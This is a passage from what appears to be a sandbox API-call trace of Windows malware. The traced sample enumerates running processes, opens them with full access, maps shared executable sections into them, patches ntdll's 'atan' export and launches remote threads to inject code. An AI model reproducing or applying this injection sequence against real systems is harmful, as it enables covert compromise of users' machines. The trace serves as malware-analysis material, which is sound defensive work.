lpProcName="wsprintfW") returned 0x74f7e061 [0169.419] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0169.419] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0169.419] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0169.419] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0169.419] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf0160000) returned 0x881f0 [0169.419] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0169.420] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0169.420] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0169.421] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0169.421] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0169.421] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0169.421] GetLastError () returned 0x0 [0169.421] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0169.421] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0169.421] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0169.422] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0169.422] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0169.423] CloseHandle (hObject=0xfc) returned 1 [0169.423] Sleep (dwMilliseconds=0x1f4) [0169.964] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0169.966] CloseHandle (hObject=0xf8) returned 1 [0169.966] CloseHandle (hObject=0xf4) returned 1 [0169.966] CloseHandle (hObject=0xf0) returned 1 [0169.966] CloseHandle (hObject=0xec) returned 1 [0169.966] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0169.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0169.966] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0169.966] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0169.966] CloseHandle (hObject=0xec) returned 1 [0169.966] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0169.966] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0169.966] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0169.967] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.967] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.967] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.967] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0169.967] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.967] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0169.967] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x70000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0169.972] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0169.972] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0169.972] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0169.972] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0169.972] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0169.973] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0169.973] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0169.973] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0169.973] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0169.973] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0169.973] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0169.973] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0169.973] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0169.973] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0169.974] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0169.974] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0169.974] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0169.974] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0169.974] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0169.974] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0169.974] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0169.974] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0169.974] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0169.974] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0169.974] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf0070000) returned 0x881f0 [0169.974] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0169.975] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0169.975] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0169.975] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0169.975] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0169.976] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0169.976] GetLastError () returned 0x0 [0169.976] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0169.976] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0169.976] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0169.976] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0169.977] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0169.978] CloseHandle (hObject=0xfc) returned 1 [0169.978] Sleep (dwMilliseconds=0x1f4) [0170.501] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0170.502] CloseHandle (hObject=0xf8) returned 1 [0170.502] CloseHandle (hObject=0xf4) returned 1 [0170.503] CloseHandle (hObject=0xf0) returned 1 [0170.503] CloseHandle (hObject=0xec) returned 1 [0170.503] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0170.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0170.503] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0170.503] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0170.503] CloseHandle (hObject=0xec) returned 1 [0170.503] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0170.503] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0170.503] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0170.503] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0170.504] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.504] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0170.504] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0170.504] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0170.504] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0170.504] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x70000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0170.509] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0170.509] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0170.509] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0170.509] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0170.509] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0170.510] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0170.510] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0170.510] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0170.510] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0170.510] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0170.510] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0170.510] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0170.510] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0170.510] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0170.511] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0170.511] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0170.511] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0170.511] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0170.511] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0170.511] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0170.511] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0170.511] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0170.511] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0170.511] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0170.511] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf0070000) returned 0x881f0 [0170.512] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0170.512] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0170.512] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0170.513] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0170.513] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0170.513] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0170.513] GetLastError () returned 0x0 [0170.513] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0170.513] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0170.513] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0170.513] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0170.514] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0170.515] CloseHandle (hObject=0xfc) returned 1 [0170.515] Sleep (dwMilliseconds=0x1f4) [0171.040] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0171.041] CloseHandle (hObject=0xf8) returned 1 [0171.041] CloseHandle (hObject=0xf4) returned 1 [0171.041] CloseHandle (hObject=0xf0) returned 1 [0171.041] CloseHandle (hObject=0xec) returned 1 [0171.041] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0171.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0171.042] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0171.042] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0171.042] CloseHandle (hObject=0xec) returned 1 [0171.042] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0171.042] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0171.042] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0171.042] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.042] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.042] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.042] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0171.042] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.042] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0171.043] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0xb0000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0171.047] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0171.047] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0xc0000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0171.047] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0171.047] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0171.048] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0171.048] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0171.048] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0171.048] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0171.048] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0171.048] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0171.048] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0171.048] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0171.048] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0171.048] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0171.049] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0171.049] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0171.049] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0171.049] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0171.049] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0171.049] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0171.049] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0171.049] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0171.049] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0171.049] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0171.049] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf00b0000) returned 0x881f0 [0171.049] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0171.051] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0171.051] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0171.051] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0171.051] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0171.052] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0171.052] GetLastError () returned 0x0 [0171.052] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0171.052] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0171.052] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0171.052] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0171.053] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0171.054] CloseHandle (hObject=0xfc) returned 1 [0171.054] Sleep (dwMilliseconds=0x1f4) [0171.574] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0171.576] CloseHandle (hObject=0xf8) returned 1 [0171.576] CloseHandle (hObject=0xf4) returned 1 [0171.576] CloseHandle (hObject=0xf0) returned 1 [0171.576] CloseHandle (hObject=0xec) returned 1 [0171.576] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0171.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0171.576] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0171.576] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0171.576] CloseHandle (hObject=0xec) returned 1 [0171.576] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0171.576] 